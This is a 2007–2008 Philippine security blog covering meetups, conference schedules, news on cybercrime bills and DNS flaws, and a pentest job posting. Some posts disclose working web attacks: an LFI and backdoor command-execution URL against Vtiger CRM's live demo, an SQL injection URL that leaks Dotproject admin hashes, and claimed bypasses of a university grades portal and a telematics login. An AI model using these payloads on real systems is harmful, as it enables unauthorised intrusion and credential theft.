He brought some needed hardware, a wifi AP, network cables, power cords, and the big racktype-like server. Jumbz btw is the sponsor for the venue, one of his siblings own the place. He sponsored for the food of which there were lots and quite tasty. He was still setting up his equipment when Drexx arrived. Drexx brought the server he promised and on which we later ran the VM's we brought. He came in talking about some forensics case he was working on and it sparked our interest.

After finalizing the equipment setup we started the main part of the conference. I learned a very cool trick on how to make a switch behave like a hub. I still can't believe that switches have a fundamental flaw like that, I asked drexx if it was vendor specific and he said no, it affected all switches.

Drexx gave an overview of Nmap, the various switches and how they affected the scan. Oh, and you could tell he was a network engineer the way he insisted on counting packet sizes to prove a point =)

Lunch Break. Like I said lots of food, more than we could eat. Jumbz and I talked a bit outside during a yosi break. He has a beowulf cluster built and he said that the server he brought was built with COTS stuff. He's also the type of guy who compiles common software from source =)

Moving on, we loaded a VM, the Win 2k image I had brought with me. It basically got hammered as we all tried to exploit it. We just used metasploit since joebert and philip were still learning how to use it. Joebert picks up real fast and even improvised a script on the fly which throws all available exploits against a target. We got a kick out of the vnc payloads, myself more so since I have'nt played with that payload before.

We also loaded up some more VM's. The 2 solaris images didn't work out, one of them didn't boot properly while the other had its root password forgotten so that we were unable to configure its network interface. Drexx had an XP SP2 image which I got shell access to. He had some honeypot software running on it =) There was also the "Nagios" VM. I claimed I could get root acces to it and I did. Not by using an exploit but by using the overheard password =) Isn't that part of network security, protect your passwords? =) Jumbz apparently has win2k3 installed on his server but I didn't attack it because I didn't know it was declared as a target.

Snack time. More food. There was so much food that we were unable to eat all of it =)

There were a number of interesting discussions that took place during the day. The topics included RNG's causing weak tokens, pentest rates, sql injection, a joomla vuln which affected philip's server, virtualization with all its present forms, vmware, virtualbox, openvz, using DEBUG to write an exe to disk, that well-known pentest team using nessus and charging an unbelievable amount for it, chinese hacking the US, drexx hacking a spammers' email account, etc.

*Misc stuff * I found out that banks here doesn't have a central body approved set of compliance and regulations which is probably why a lot of them use obsolete win2k's in their internal network. I have a feeling audits and pentest will be a moneymaker if they ever get one =) I got to try out smbshell the precompiled nasl script while the others were practising with metasploit. I brought an eee which ran all my sofware and scripts perfectly, except for nessus which I didn't even try out once during the con since I know it's such a memory hog. I found out that an open flame food warmer will get people to sniff their hardware =)

That was basically it. Not bad for an introductory meetup =). I got picked to present about w3af, of which I know nothing about, next meeting. Future sessions would involve wardriving, OWASP stuff, more metasploit stuff, and more food =)

Ethical Hacking Seminar

2008-11-23T17:22:00.003+08:00

TPCEvents.org will be holding a seminar on Ethical Hacking with Joebert Jacaba as speaker. Joebert is one of the guys I met during the recently held PUORSU conference.

Ethical Hacking
Date: Nov 30, 2008 - Sunday
Time: 1:00 pm to 6:00pm
Speaker: Joebert Jacaba
Description: I: Introduction to Ethical Hacking Philippine E-Commerce Law II: Footprinting III: Scanning IV: Enumeration V: System Hacking VI: Trojans and Backdoors VII: Sniffers VIII: Denial of Service IX: Social Engineering X: Session Hijacking XI: Hacking Web Servers XII: Web Application Vulnerabilities XIII: Web Based Password Cracking Techniques XIV: SQL Injection XV: Hacking Wireless Networks XVI: Viruses XVII: Evading IDS, Firewalls and Honey pots XVIII: Buffer Overflows XIX: Cryptography
Venue: Roofdeck 23 Capinpin Place Capinpin St. San Antonio Pasig
Fee: 350

Upcoming Security Cons / Gatherings in the Philippines

2008-11-13T23:02:00.007+08:00

Defconph Beer Talk

SATURDAY DECEMBER 20 2008
1:00PM	1:10PM	Welcome Address
1:10PM	1:30PM	Introduction of DefconPH
1:30PM	2:20PM	Google Hacking + Live Demo
2:20PM	2:30PM	Q & A
2:30PM	3:20PM	Network Reconnaissance + Live Demo
3:20PM	3:30PM	Q & A
3:30PM	4:20PM	Information Security: An Overview
4:20PM	4:30PM	Q & A
4:30PM	5:20PM	Tactical Attack Vectors + Live Demo
5:20PM	5:30PM	Q & A
5:30PM	5:45PM	Closing Remark by the Founder of DefconPH
5:45PM	onwards	Professional Networking + Group Discussion + More Beers

A precursor to a full-blown defcon event here in the Philippines. Only trouble is that it's going to be held in Cebu.

Put-up-or-shut-up Conference (PUORSUC)

An informal gathering organized by members of the PLUG (Phil. Linux Users Group) mailing list. Details still to be announced.

http://archives.free.net.ph/thread/20081112.033051.51d23a4a.en.html

Hackacon Cebu

December 5, 2008

For only Php3,995.00/person

Inclusive of Certificate, Handout, AM/PM Buffet Snack and Buffet Lunch

+ FREE GK Souvenir Shirt & Other Sponsor Give-aways

Venue: Cebu Midtown Hotel, Fuente Osmeña,Cebu City, Philippines

ONE DAY – FRIDAY 5 DECEMBER 2008
07:30am – 08:00am	Registration
08:00am – 10:00am	Behind the Scenes of Network Hacking + Live Demo
10:00am – 10:15am	Q & A / Coffee Break
10:15am – 12:15pm	Protection Against TCP/IP Attacks + Live Demo
12:15pm – 01:00pm	Lunch Break
01:30pm – 3:00pm	OSSEC for (Linux, OpenBSD, FreeBSD, MacOS, Solaris and Windows) + Live Demo
03:00pm – 03:15pm	Break
03:15pm – 05:00pm	IronPort® - Email Security Appliance from CISCO 2.5 + Live Demo
5:00pm – 5:30pm	Q & A and Issuance of Certificate

What's interesting is that, except for the Hackacon Cebu, all the events seem to make it a point of not being commercialized e.g. not having corporate sponsors. This is a good thing since it was the biggest gripe against ManilaCon. Hopefully the PUOSUC pushes through. I won't be attending the defconph event since it's going to be held in Cebu and I'm not about to spend for airfare for a half-day event. Same goes for the Hackacon event.

Mobile Pentesting Devices

2008-09-19T16:45:00.005+08:00

With the advent of netbooks, PDA's, and cellphones capable of running a full-blown OS, there's no need to carry around a 3 kg. laptop to do your network security audits. The following are commercial devices tweaked to support a number of pentesting tools and applications.

NeoPwn

Based on the OpenMoko platform. Uses Debian as the OS and runs open source pentesting tools with custom gui scripts. Cost is 699 US$ for the basic package.

Silica

Immunity's mobile pentesting product. Based on the Nokia N800 internet tablet. Runs custom software developed by Immunity. Cost is 3,600 US$ which includes software (exploit) updates for one year.

ipwn.mobi

H.D. Moore's side business. Uses the HP 2133 Mini-Note with the wifi card replaced with an atheros wifi card. Uses Kubuntu as the OS and most definitely runs Metasploit. Cost is 899 US$.

And then there are also the homebrew ones ranging from Sharp Zaurus installed with pentest software, Windows Mobile PDA's with replaced firmware, UMPC's installed with Backtack, etc.

So if there's anyone out there who wants a mobile pentest device and can afford to buy an EEE and pay me 1,000 pesos for a Backtrack installation then just contact me =)

Pen Tester Wanted

2008-09-14T22:35:00.006+08:00

Found on the LinuxJobs-PH mailing list. Almost every security enthusiast has this as a kind of dream job =) Unfortunately I don't think I qualify :(

Good day,

Hi guys, we still have one more opening for the position indicated below:

Position/Title: Associate, Technology and Security Risk Services

Description

The SGV Security and Technology Solutions (STS) Team is a key
component of SGV & Co. / Ernst & Young's Technology and Security Risk
Services Practice. Ernst & Young's security professionals deliver
enterprise security and risk-based services enabling our clients to
take advantage of the evolving electronic economy in a secure manner.
These professionals have extensive experience with information
security protection, system security planning, information security
assessments and implementation, security program development, business
continuity planning, and strategic technology planning. These services
help companies validate their infrastructure; design and implement
business processes and technology solutions; address regulations; and
educate and train management and employees. We currently have a career
opportunity for a staff professional to participate in multiple client
engagement teams and other related activities in our Security and
Technology Solutions (STS) Team.

The STS Team is dedicated to providing attack and penetration security
testing and vulnerability assessment to discover and mitigate clients'
security risks before they can be exploited by unauthorized parties.
The STS Team is equipped and configured to provide maximum
collaboration and teaming opportunities.

Responsibilities

•Perform vulnerability assessment and penetration testing in internet,
intranet, dial-up and wireless environments
I think I can do these things =)

•Perform discovery and scanning for open ports and services
I can use nmap, superscan, etc and can most possibly learn how to use unicornscan, ikescan and a lot of other scanners =)

•Apply appropriate exploits to gain access and expand access as appropriate
Honestly I like metasploit for the exploits and meterpreter as the payload to pivot inside a network. And I know how to use net commands and how to psexec on windows networks =) Oh and a milw0rm compilation .tgz file is handy =)

•Participate in activities involving application penetration testing
and application source code review
I'm more partial to black box testing. Anything more complex than greppable insecure methods in source code usually means a lot of time required to exploit it =)

•Interact with the client as required throughout the engagement
Sure. If needed =)

•Prepare reports documenting discoveries during the engagement
No problem =)

•Debrief the client at the conclusion of each engagement
I can probaly do this too =)

•Participate in research and provide recommendations for continuous improvement
Ditto =)

•Participate in knowledge sharing
I blog dude =)

Qualifications

To qualify, candidates must have:

•A bachelor's or master's degree in computer science, information
technology, computer engineering, or a related major
Nope. I'm not an IT grad

•1 to 2 years of experience in one or more of the following:
UNIX-based Operating Systems (Linux, IBM AIX, HP-UX, Solaris, Mac OS
X), Windows, networking and wireless security; attack and penetration
testing; security testing of web-based applications; and application
security source code assessments. Fresh graduates are welcome to apply
Used to be a part-time *ehrm*.... But I graduated from that =)

•Experience with programming languages/platforms such as Java, J2EE,
x86 Assembly Language, C, C++, ASP, PERL, PHP, Ruby and Microsoft .NET
If I can program passably well in any of those languages I'd seek work as a programmer and not bother with security at all =)

•Experience in commercial and open source security tools including
BackTrack, Cain, Metasploit, CANVAS, WebInspect, Retina, ISS, and
Nessus/OpenVAS is a plus
Have used BackTrack, cain, Metasploit and Nessus. I have an old copy of CANVAS but it's way too old so I haven't played with it much. Oh, and why isn't Core Impact on the list? Too expensive =)

•Manual attack and penetration testing experience above and beyond
running automated tools is a plus
IMHO, this shouldn't be a "plus", it should be required =)

•Experience developing custom scripts or programs (used for port
scanning, vulnerability identification and exploitation) is a plus
I can use/learn more bash scripting =)

•Application development experience is a plus
Zero here =)

•Strong technical skills related to a broad range of operating systems
and databases
Define strong =)

•An understanding of web-based application vulnerabilities
I sorta have minor experience on finding vulns with web apps =)

•An understanding of global standards like COBIT, GLBA, HIPAA, FFIEC,
PCI DSS, and ISO/IEC 27001/27002/20000
I honestly have been trying to find time to read up on PCI DSS but I've been kinda busy =)

•Excellent teaming and communication skills
Yada yada blah blah blah =)

•Demonstrated integrity in a professional environment
Sure =)

•Willingness and ability to travel (including potential overseas
travel for international clients)
Yes! =)

The successful candidate must hold or be willing to pursue related
professional certifications such as CISSP, CISM, CEH, ECSA, LPT, GSEC
and/or CISA.
Hey, If you're going to pay for it... =) The exam fee alone is expensive not to mention the courses to prepare for it

If you are interested or have any questions, please email
your resume or queries to christian.s.masancay@???.

Hmm... =)

Fast!

2008-09-08T09:23:00.001+08:00

HFS! Google Chrome when used with Privoxy (to filter ads) is fast!

Google Chrome Browser Exploit

2008-09-04T15:53:00.004+08:00

First published exploit for Google's Chrome Browser. Automatically downloads a file without prompting the user. However it does not seem to automatically execute the downloaded file so the risk is not that great.

http://milw0rm.com/exploits/6355

Google Browser Released

2008-09-03T11:27:00.002+08:00

http://www.google.com/chrome

Google recently released Google Chrome (BETA) an open source browser. I'm betting there's about a hundred people fuzzing the hell out of it right now =)

MySpace Cofounder Tom Anderson Was A Real Life “WarGames” Hacker in 1980s

2008-09-03T09:10:00.002+08:00

http://www.techcrunch.com/2008/08/30/myspace-cofounder-tom-anderson-was-a-real-life-wargames-hacker-in-1980s/

"In 1985, when he was fourteen and in high school in Escondido, California, Anderson was subject to one of the largest FBI raids in California history after hacking into a Chase Manhattan Bank computer system and subsequently showing his friends how to do it. He was never arrested because he was a minor, but the FBI confiscated all of his computer equipment and some newspaper accounts of the incident stated incorrectly (see image below from a 1986 LA Times story) that he was “convicted in federal court of computer hacking and placed on probation” (the statements were corrected in subsequent articles). Anderson used the hacker name “Lord Flathead.”"

Actually this is quite common. In the Philippines did you know that linux luminaries R_____ and S_____ used to be members of a hacker group? =)

DNS flaw redirects Internet users to wrong websites

2008-09-01T11:19:00.002+08:00

http://newsinfo.inquirer.net/breakingnews/infotech/view/20080831-157877/DNS-flaw-redirects-Internet-users-to-wrong-websites

MANILA, Philippines -- A flaw in the Internet’s domain name system (DNS), first detected more than a month ago, is affecting Internet service providers (ISPs) and their customers, according to a local security expert.

Security researcher Dan Kaminsky first detected the flaw early July and discussed it at length at a security conference a month later, although it was thought to have been already exploited by hackers.

The problem concerns the DNS, which translates numerical IP addresses into Web addresses (URL) familiar to users. By typing in that address, such as www.inquirer.net, users do not have to wrangle with memorizing numerical IP addresses to input into their browsers.

Experts fear that the flaw is now being exploited in such a way that a user who enters a legitimate address may be redirected to a different site or worse, a bogus mirror site that's actually designed to gather sensitive information such as passwords and credit card numbers.

INQUIRER.net has received feedback from readers calling attention to local Web addresses that have been redirected instead to different sites.

Joey Santos, CEO of local security services provider NetX Technology Solutions, reported that at least two local banks have encountered possible DNS-related problems, in particular detecting email containing suspicious links to their respective websites.

"It could be isolated cases involving some of their employees. But nonetheless these banks are investigating it," Santos told INQUIRER.net via telephone.

Reports about the DNS flaw also advise Internet service providers (ISP) to protect mail servers and ensure they are accessing protected (or patched) DNS servers.

Local ISPs and service providers could not be reached for comment as of this writing.

The problem is, ISPs usually do not hold themselves accountable when it comes to security cases such as this which is presumably out of their control, according to Santos.

"Their SLAs (service level agreements) only cover connectivity and the usual issue (for the user) is speed," Santos said. "In the US, it is a bigger deal because customers pay a premium for added security services from their ISPs."

Major technology companies including Microsoft and Cisco have reportedly convened and are issuing appropriate patches to their products specific to this DNS problem. Security and anti-virus company Trend Micro has also blogged about this "DNS cache poisoning" flaw in July.

In its blog, it pointed out that it was the Unites States Computer Emergency Response Team that was first to published about this vulnerability, as it detailed the security implications and the possible vendors affected.

"While this is completely unrelated to any particular malware, there is a rather disconcerting DNS cache-poisoning vulnerability that has surfaced which deserves the attention of any and every organization on the planet which operates their own DNS servers," Paul Ferguson of Trend Micro's Internet Security Intelligence in Advanced Threats Research group wrote as early as July 22.

"The importance of determining if you are vulnerable, and getting the vulnerability fixed quickly, is becoming more important as each days passes. This is due not only to the criticality of the vulnerability, but also due to some of the 'colorful' background in how some of the details have become available surrounding the vulnerability itself," he said.

User are also advised to go to this website to check if DNS servers their browsers are using are prone to attacks.

ISP's should get sued if one of their customers get scammed as a result of the ISP's not patching their servers =)

Adrian Pastor meeting Captain Crunch

2008-08-29T18:21:00.002+08:00

http://www.gnucitizen.org/blog/viva-la-defcon/

Captain Crunch looks like he's high =)

RP can’t do without policy on data privacy, security

2008-08-26T09:50:00.001+08:00

http://www.mb.com.ph/INFO20080826133382.html

Under no circumstances can the Philippines compete, let alone thrive, in the lucrative outsourcing market and the global marketplace without a fool-proof policy on data protection and security.

This was the clear message sent out by participants in a recent conference dubbed "Mapping the Future of Information Security Forum" organized by the Information Systems Security Society of the Philippines (ISSSP) at a hotel in Makati City.

Anthony Tuason, a director at consultancy firm PriceWaterhouseCoopers, said during his presentation that IT companies, most especially those in the BPO sector, cannot possibly institute "IT governance" — the process of using technology as to management tool to run an organization — in the workplace if security is being disregarded.

"Innovation, value, and performance can be derived from IT governance (and) data privacy and security is one area that helps organizations achieve their IT governance objectives," Tuason said.

Local BPO firms have a huge stake in this issue, Tuason said. "A company must understand both the impact of laws of the country where data originates and the laws of the Philippines where data is processed. Responsibility for compliance with the originating countries’ laws will rest with the company.’

Industry groups such as the Business Processing Association of the Philippines (BPAP) and Philippine Internet Commerce Society (PICS) have urged the government to pass a law governing data privacy and security.

The BPAP has actually partnered with the Commission on Information and Communications Technology (CICT) for a Technical Working Group (TWG) composed of representatives from the private and public sectors that would look into the pending bills on data privacy and security.

The BPAP said that aside from pushing for the passage of the bills, it also would work for the appointment of a "privacy commissioner" who will act as the primary protector of data privacy rights against misuse and abuse by individuals, private organizations, and even the government.

According to the National Cybersecurity Coordinator Virtus Gil, who was also a speaker during the ISSSP confab, the government has already laid down a strategy for national cybersecurity, which deals mostly to security threats against the country.

The program, Gil said, has three goals: to reinforce current policy and operational measures to reduce vulnerability in the cyberspace under Philippine jurisdiction; to nurture a culture of cyber security amongst users and critical sectors; and to strengthen self-reliance in terms of information security technologies and human resources.

Buhay pa pala ISSSP?
We have a National Cybersecurity Coordinator?

Red Hat servers breached

2008-08-24T18:04:00.001+08:00

https://www.redhat.com/archives/fedora-announce-list/2008-August/msg00012.html

http://rhn.redhat.com/errata/RHSA-2008-0855.html

Quotes;

"Last week Red Hat detected an intrusion on certain of its computer systems
and took immediate action. While the investigation into the intrusion is
on-going, our initial focus was to review and test the distribution
channel we use with our customers, Red Hat Network (RHN) and its associated
security measures"

"One of the compromised Fedora servers was a system used for signing
Fedora packages."

Help, there's a resident rootkit in the memory

2008-08-24T16:37:00.001+08:00

http://tipidpc.com/viewtopic.php?tid=159021

The first ever publicly reported resident rootkit implanted in volatile memory =)

Hijack the Internet

2008-08-20T17:10:00.001+08:00

http://eng.5ninesdata.com/~tkapela/iphd-2.ppt

BGP. Scaaryy.. =)

CICT endorses latest anti-cybercrime bill in Congress

2008-08-20T09:20:00.003+08:00

http://newsinfo.inquirer.net/breakingnews/infotech/view/20080818-155361/CICT-endorses-latest-anti-cybercrime-bill-in-Congress

MANILA, Philippines -- The government's highest IT-governing body is hopeful that increased awareness and support will push lawmakers this time to finally pass a bill against cybercrime.

In a statement, the Commission on Information and Communication Technology (CICT) said it has endorsed before Congress the "Cybercrime Prevention Act of 2008", which consolidates four cybercrime-related bills authored by different lawmakers.

This consolidated bill also resulted from a technical working group created last year and spearheaded by the CICT and Department of Justice.

In its Declaration of Policy, the bill authorizes the State, "to adopt sufficient powers to effectively prevent and combat such offenses by facilitating their detection, investigation, and prosecution at both the domestic and international levels, and by providing arrangements for fast and reliable international cooperation."

The proposed bill defines various forms of cybercrime offenses and prescribes corresponding punishments. These offenses include hacking, identity theft, phishing, spamming, website defacement, denial-of-service (DoS) attacks, malware or viruses, child pornography and cyber prostitution.

A representative from the Council of Europe also joined the technical working group in refining the bill further in order to "harmonize" it with European standards on cybersecurity.

CICT commissioner Tim Diaz de Rivera is also counting on increased support from private sector groups this time, including the Business Process Association of the Philippines (B/PAP) which represents the outsourcing industry.

"B/PAP, for example, is supporting it order to sell the country better to investors and ensure they are very wel covered when it comes to cybersecurity in the Philippines," Diaz de Rivera told INQUIRER.net.

The CICT commissioner is also counting on increased awareness on the part of congressmen about IT and the need for the country to keep up with more progressive neighboring countries like Malaysia and Singapore when it comes to related legislation.

Another proposed bill creating a national ICT department is also currently undergoing hearings at the Senate. The CICT is likewise hoping that increased support for the said bill will rub off on the anti-cybercrime bill.

Diza de Rivera admitted previous versions of these bills fail to make it into law because of more pressing proposed laws being heard in the Senate and Lower House.

Cybersecurity-related bills have been filed in Congress and Senate since four or five years ago without success.

"Definitely there is increased support this time but it's really in the hands of lawmakers. We are always on-call if they need clarification about the proposed bill," Diaz de Rivera said.

The latest anti-cybercrime bill also mandates the creation of a National Cyber Security Office, under the CICT, whose task is to formulate and implement a national cyber security plan.

Some of its functions include the preparation and implementation of appropriate measures to prevent and suppress cybercrime offenses; the monitoring of investigations of cybercrime cases; the facilitation of international cooperation on cybercrime prevention and prosecution.

National Cyber Security Office. Apply kaya ako dito =)

Next step would be Approved Standards and Frameworks for IT Implementations =)

Nuts about Security

2008-08-17T19:06:00.006+08:00

Hackacon

It was supposed to be held at SM Megamall but the venue got changed. Went by Megamall on the way home and saw the event there was the National Coconut Week. If there was a disagreement between the hackacon organizers and the SM management I hope the latter didn't say "We could get bigger nuts than you people". =)

The sessions I attended were actually quite good given the limited frame. I could imagine the impact and breadth of knowledge being gained by someone who hadn't dealt with the stuff before.

Overall these kind of cons are good for the local security scene.

Biggest bummer was the contest being cancelled.

Got a cool shirt =)

There was a speaker named Wilbert Ontoy. I heard he got owned 2 days after the con. Maybe he taught them too much? Or too little? =)

The hackers you must fear...

2008-07-09T13:36:00.003+08:00

No, not the skiddies. These kind of people...

http://www.int.iol.co.za/index.php?set_id=1&click_id=13&art_id=vn20080703061212942C901462

"He was the thorn in the side of South Africa's four giant banks whose top cyber experts were left red-faced every time he hacked through several security features and accessed their "secure" banking accounts."

"In a single day on December 24 2005 he swiped R9,8-million from the account of a government department."

"I never needed the money, I was a software architect for a computer company where I was earning R80 000 a month. What I was doing was just for fun. It was the thrill of being able to do it,"

"...has a BSc degree in computer sciences from Rand Afrikaans University..."

http://www.fastcompany.com/magazine/127/nexttech-fear-of-a-black-hat.html

"announced on a popular computer-security forum that he had 0days for Linux, HP-UX (the computer maker's popular Unix database software), Microsoft Windows, and Apache."

"...who works full time at HP..."

"...he saw nothing wrong with offering tools and techniques that targeted the company providing his paycheck..."

"An HP spokeswoman admitted the company has a rogue employee in France and said it was investigating along with the FBI."

OpenBSD Local Exploit

2008-07-01T22:29:00.002+08:00

OpenBSD 4.0 local exploit

See the movie

Brought to you by Lance M Havok aka LMH

PRC site flagged by Google

2008-06-26T21:51:00.001+08:00

http://www.google.com/safebrowsing/diagnostic?site=http://www.prc.gov.ph

Newsworthy?

2008-06-22T17:05:00.003+08:00

Some things I saw on the Net...

Metasploit site gets hacked ... Not really, just made to appear as if it was.
Erik Bloodaxe resurfaces... Is this the same Chris Goggans of LOD?

Cisco router rootkits... = bad news, since a lot of infra backbone depends on them

Most of the above items are a bit old, I was a little too busy to blog about them at the time.

And now for some local news... (Somehow this makes me laugh =) )

RP computer hackers turning into syndicates

Isn't this guy just watching Youtube?

"Authorities have been monitoring certain e-groups or "societies" that could be behind big, transnational cyber crimes..."

"...There is also a group of crackers, college boys, who only focus on getting credit card information"

"the syndicate committed phreaking, which exploited security loopholes to obtain free access to telephone calls at the expense of customers of the Philippine Long Distant Telephone (PLDT). The process involves using a "war dialer" to call different phone numbers and then guessing the pincodes to those numbers in order to freely access the system to make long distance calls."

the use of wardialers is so early 90's =)

"We used 200 men—SWAT, PNP, NBI—all fully armed because we didn’t know what we were up against."

Whaaatt?

".. was the absence of the money trail that bewildered law enforcement at first..."

Always about the money =)

Alex Ramos, Anti-Hacker Man

Some Personal news...

I got an Asus EEE! Yesss!

Actually it's my gf's.
But I'm paying for it. Hmm... Wait a minute...

Busy..

2008-06-22T16:53:00.003+08:00

Been having quite a turbulent time with "My Day Job". The company I work for had some massive reorganization which resulted in the head our department resigning, having a non-technical person taking his place, numerous resignations from employees including some who were at the managerial level, and me having to do the jobs of three engineers. Oh well...

Maybe I should start looking for a new job :)

NBI exasperated over delay of cybercrime bill, hits CICT

2008-04-20T19:47:00.001+08:00

An IT officer of the National Bureau of Investigation (NBI) has lambasted the continued delay in the passage of the country’s cybercrime law, pointing out in particular the failure of the Commission on Information and Communications Technology (CICT) to submit an industry-drafted amendment to strengthen a bill currently pending in Congress.

"We’re frustrated in our law-enforcement work because we cannot go after these cybercriminals. Every minute that passes without a law on cybercrime is always an opportunity for them to do what they want," said Palmer Mallari, executive officer of the NBI anti-fraud and computers crime division.

Obviously backdoored

2008-03-21T02:36:00.002+08:00

http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1157
http://www.cisco.com/warp/public/707/cisco-sa-20080313-ipm.shtml

"CiscoWorks IPM is a troubleshooting application that gauges network response time and availability. It is available as a component within the CiscoWorks LAN Management Solution (LMS) bundle. IPM version 2.6 for Solaris and Windows contains a process that causes a command shell to automatically be bound to a randomly selected TCP port. Remote, unauthenticated users are able to connect to the open port and execute arbitrary commands with casuser privileges on Solaris systems and with SYSTEM privileges on Windows systems."

App na naggagauge ng network time magbubukas ng bindhsell!? Ayusin mo, Cisco!

You never know...

2008-02-26T21:15:00.002+08:00

I found out a very cool way to do something which a lot of people want to do =) I won't go into specifics since by having the info spread it would pretty much lead to it being unusable. I actually had this idea a long time ago but I thought to myself that such an obvious way would surely not be permitted. So you never know... =)

Hackacon 2008

2008-02-25T22:22:00.003+08:00

http://www.hackacon.com/main.html

HackaCon 2008 – An International IT Security Convention, Exhibition and Training, the only conference dedicated entirely to keep data safe, secure, and private, will be held on August 8 – 10, 2008 at the SM Mega Trade Hall 1, Mandaluyong City, Philippines.

SESSIONS

P 500.00 / Topic - Inclusive of Certificate

* Certified Ethical Hacking and Countermeasures (CEH)
Featured Speaker: Wilbert Ontoy

* Linux Security
Featured Speaker Michael Angelo Liquit

* Disaster Recovery (DR)
Featured Speaker: Abel Villoria

* Licensed Penetration Tester (LPT)
Featured Speaker: Wilbert Ontoy / Armand

* Security+
Featured Speaker: Wilbert Ontoy

* Microsoft Security
Featured Speaker: Jefferson Agruda

* Hardening against TCP/IP Attacks
Featured Speaker: Edward Brian Bono

* Wireless Hacking and Security
Featured Speaker: Darwin Luzuriaga

* Computer Hacking Forensic Investigator (CHFI)
Featured Speaker: Ariel Ilumin (PNP Forensic Expert)

[Let's see how this turns out. Nice mix of topics. The organizers should have should have registered as a defcon group =) ]

Vtiger CRM Exploit ( 0-day )

2008-02-17T22:34:00.012+08:00

Vtiger CRM is 100% Open Source Customer Relationship Management solution built over LAMP/WAMP stack and other third-party open source packages. I made a quick run-through on their demo site and discovered some stuff.You need to be authenticated first.

LFI

http://en.vtiger.com/index.php?action=../../../../../../../../etc/passwd% 00&module=Home

Command Execution

First, upload a php backdoor disguised as a valid picture file. And then...

http://en.vtiger.com/index.php?cmd=uname%20-a;id;pwd&action=../../storage/2008/February/
week1/31361_kidlat.gif% 00&module=Home

I did not install the software and I stopped when I reached this point so I wasn't able to find all the bugs =)

[there sould be no space between % and 00 in the url, can't post it as such here coz blogger's stripping them out]

The real reason...

2008-02-17T22:21:00.002+08:00

... why you rarely see any Windows XP SP2 remote exploit is because there's a lot of buyers out there for these kind of exploits and they pay well =)

Defcon in the Philippines

2008-02-17T22:09:00.003+08:00

DEFCON is now in the philippines. The guys from the defunct rootdrive.net and nullcode.net have registered a new defcon group . Visit their new site. Personally, I'm looking forward to a real hacker-type con =)

Free mobile yahoo

2008-02-08T15:26:00.000+08:00

Globe users can browse yahoo mobile for free meaning you can chat with your friends even if you don't have cellphone load. I use it to stay updated on things by subscribing to active security lists. Aspiring hackers may find a way to configure their servers to execute shell scripts upon receiving certain emails and mailing back the output.

New version of metasploit released

2008-01-30T18:07:00.000+08:00

Metasploit 3.1 released. The best FREE exploitation platform out today.

Dotproject Exploit ( 0day )

2008-01-11T11:51:00.000+08:00

Dotproject is a web based project management software based on LAMP. The following url will give out the admin password hash.

http://site.com/dotproject/index.php?m=public&a=contact_selector&selected_contacts_id=1)%20union%20select%20user_password%20from%20users%20where%20user_id=1/*

This can be exploited from an ordinary user account, but you need to login first.

Clarification (1-14-08)
Fixed the misplaced the asterisk symbol (*) on the original link.

Edit ( 1-30-08 )
Patched na daw. Follow the thread

Pangasinan State University's Xsystem 2007

2007-12-30T20:35:00.000+08:00

From their website

"All ICT students who have undergone the computerized enrolment through the XSystem 2007 this 2nd Semester 2007-2008 can now access their individual student portals to view their Transcript of Records and Account Ledgers online by logging-in their secured accounts issued by the XSystem Administrator."

You can change the grades and other stuff once you bypass the authentication.

HSBC Security Device

2007-12-10T23:52:00.000+08:00

Here are the pictures of the HSBC security device which a client needs to login to his online HSBC account. It's kinda like SecurID. More information about these kind of devices can be found here.

WabiSabiLabi founder arrested for alleged spying

2007-11-08T17:12:00.000+08:00

http://www.techworld.com/security/news/index.cfm?newsID=10565

"Roberto Preatoni was charged Monday with unauthorised access to computer systems and wiretapping, said the reports (in Italian). Sources confirmed he is the same Roberto Preatoni who is a founder and director of strategy with WabiSabiLabi. A representative at the security startup declined to comment Tuesday. He said the company would email a statement later in the day.
Preatoni's company was launched in July, billing itself as an online marketplace for exploit code that could be used to hack into computer systems. Legitimate companies such as 3Com and Verisign have paid for this type of code in the past, but WabiSabiLabi was the first open marketplace for such software."

[snip]

"In January, four others were charged with spying in connection with the scandal. They included Fabio Ghioni, vice president and security CTO (chief technology officer) at Telecom Italia, and Giuliano Tavaroli, the telco's former head of security."

[A security CTO and a former head of security of a telecom company being charged of spying. Makes you think doesn't it?]]

Increasing demand for cybersecurity pros in RP seen

2007-11-02T00:00:00.000+08:00

http://newsinfo.inquirer.net/breakingnews/infotech/view_article.php?article_id=98133

"MANILA, Philippines--A computer school and two cybersecurity experts have said that there is increasing demand for cybersecurity professionals in the Philippines."

"Computer school Informatics said that a certified cybersecurity professionals can command an average of $35,000 to $80,000 of monthly income in the US."

[Informatics offer a CEH (Certified Ethical Hacker)Course for about 30,000 PHP. The number of registrants must be quite low]

"In the Philippines, Albert dela Cruz, who is a director of the Philippine Computer Emergency Response Team, said that the pay scale could be lower."

[most definitely]

"Dela Cruz also pointed out that more local organizations are now recognizing the need to protect their critical infrastructure by creating a new position: the information security officer.

"Security should be everybody's concern. One weak link in the chain can affect everybody else," he stressed."

[We need a scapegoat to kick around when our company database gets whacked]

IMX / Nextel

2007-11-01T23:33:00.000+08:00

Who provides NAKTF fast, reliable and secure connections for their relentless crusade against the heinous crime of kidnapping?

IMX does.

A vulnerability exists in their Telematics web application. It's location is hardcoded into their client units' browser. Basically it's an sql injection issue. The novel part is that mode of transport is by radio waves (Iden Technology).

A regular failed login;

By exploiting the issue we successfully log in;

Gov't, private sector revive push for RP cybercrime law

2007-10-25T20:53:00.000+08:00

http://technology.inquirer.net/infotech/infotech/view_article.php?article_id=96490

"Among the groups supporting the cybercrime bill are the Philippine Certified Information Systems Security Professionals of the Philippines (PH-CISSP), the Information Systems Audit and Control Association (ISACA), the Philippine Software Industry Association (PSIA), the Philippine Computer Society (PCS) and the Information Systems Security Society of the Philippines (ISSSP), said Albert dela Cruz, director of the Philippine Computer Emergency Response Team (PH-CERT) and currently platform strategy manager at Microsoft Philippines, in an interview"

[hmm, microsoft supported..]

"As you know we've been at it for more than seven years or even longer. I've lost count. We never made it past plenary of the House of Representatives. Now, with the DOJ and renewed support from the CICT, we hope that they make this a priority measure," he added."

[seven years? there must be a reason]

"For years, various sectors have been lobbying for a cybercrime law in the country. Dela Cruz said the cybercrime bill aims strengthen and align the country's laws on cyber security and protection, while also creating international cooperation among other countries considering that cybercrime is a global phenomenon"

[I thought the E-commerce law was supposed to cover cybercrime (Section 3.3)]

""We want to be part of the Europen Union Cybercrime Treaty. To effectively combat cybercrime across borders and jurisdiction a common law (similar laws individually) or a treaty needs to be in place. And to be able to sign the treaty, we have to pass a bill that is in consonance with the prescription of the treaty," Dela Cruz added"

